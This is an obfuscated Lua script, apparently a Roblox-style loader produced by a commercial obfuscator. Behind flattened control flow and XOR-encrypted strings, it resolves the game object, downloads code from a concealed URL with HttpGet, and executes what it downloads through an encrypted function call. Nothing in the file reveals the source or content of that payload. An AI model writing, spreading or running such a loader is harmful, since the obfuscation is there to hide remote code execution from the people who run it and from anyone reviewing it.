-- This script was generated using the MoonVeil Obfuscator v1.2.2 [https://moonveil.cc]

local m=table.unpack;
local i,g,d,u,f,q,y,h,a,A,v
u,h={[19997]=26620,[-3259]=31402,[3839]=1359,[-28200]=-4828,[-18879]=7715,[-15775]=17848,[2401]=7450,[-25134]=20731,[9133]=31402,[-5442]=-2089,[18535]=-21702,[-16375]=17848,[-1272]=-2162,[2635]=17848,[2686]=17848,[-25745]=31402,[28707]=-2089,[-30433]=-2162,[-26942]=25341,[-3896]=-2162,[-28928]=-2162},function(l)
    return u[l- -21188]
end
q=h(-46933)
repeat
    while true do
        if q==-229025432- -229056834 then
            i=(getfenv());
            q=h(-50116);
        elseif q==1630480575-1630482664 then
            d=(function(...)
                local e=g('#',...)
                local r=y(e,nil);
                f({...},1,e,1,r)
                return{[1]=r,[2]=e}
            end);
            q=h(-17349);
            break;
        elseif q==-1169250293- -1169248131 then
            a,v,A=(string.char),(string.byte),(bit32 .bxor);
            q=h(-18502);
        elseif q==1.3272497493594668e-05*1344735609 then
            g,y,f=(select),(table.create),(table.move);
            q=h(7519);
        end
    end
until q==235764283+-235762924
local c,b,o,_,j,t,s,w
w,c={[7341]=14490,[-6253]=5627,[-16821]=-4428,[-4758]=9174,[-13813]=5627,[-20273]=-4428,[15776]=-31023,[-28972]=-8599},function(k)
    return w[k+14234]
end
_=c(-31055)
repeat
    while true do
        if _==-1681077686- -1681098361 then
            j=i[j]
            _=638319197-638325108
        elseif _==-4.1393035567677677e-05*-366994104 then
            j=j(m(o[1],1,o[2]))
            _=-2107092508- -2107093976
        elseif _==1034433272-1034427645 then
            _=c(1542);
            break;
        elseif _==-1880018218+1880032708 then
            b=s.HttpGet
            _=-1397920607+1397942648
        elseif _==5.6852215623993552e-06*-1039713217 then
            s=i[(function(z,p)
                local n=''
                for x=0,#z-1 do
                    n=n..a(A(v(z,x+1),v(p,x%#p+1)))
                end
                return n
            end)('\133\244\143\240','\226\149')]
            _=c(-6893)
        elseif _==-689546715076/-56785532 then
            s='\184\ba\vh'
            _=c(-43206)
        elseif _==-9486429603420/-1002793827 then
            t='p\158\3\244\146\213\204\216\193\v\211\211\130\190\243\17\152H\25\200\198TK\4d\229]M\199\156\194V{\147\30\2*\219\220!\2\194'
            _=-8630742542760/-1062375990
        elseif _==10210995-10219594 then
            j=(function(z,p)
                local n=''
                for x=0,#z-1 do
                    n=n..a(A(v(z,x+1),v(p,x%#p+1)))
                end
                return n
            end)(j,s)
            _=1.1926156834054707e-05*1733584447
        elseif _==-451001584- -451003052 then
            j=j()
            _=c(-20487)
        elseif _==-2693721088596/-667423461 then
            o=d(b(s,m(o[1],1,o[2])))
            _=581841955-581826764
        elseif _==1030489431+-1030481307 then
            o=d((function(z,p)
                local n=''
                for x=0,#z-1 do
                    n=n..a(A(v(z,x+1),v(p,x%#p+1)))
                end
                return n
            end)(o,t))
            _=-308228636+308232672
        elseif _==986595670476/-222808417 then
            j='\212g\0o\27\204z\be\15'
            _=12719814114540/1047501780
        elseif _==1.3449287955026944e-05*1638822819 then
            o='\24\234w\132\225\239\227\247\179j\164\253\229\215\135y\237*l\187\163&(k\n\145\56#\179\178\161\57\22\188xnE\188\241Fm\169_\205J\185\212\154\130\145\128&\135\150\209\234\220c\253.j\231\174\49*\96\23\202\48,\174\242\237;\26\225wlO\245\189Mr\170\17'
            _=-23795090- -23804550
        end
    end
until _==44819442430317/-1444716579
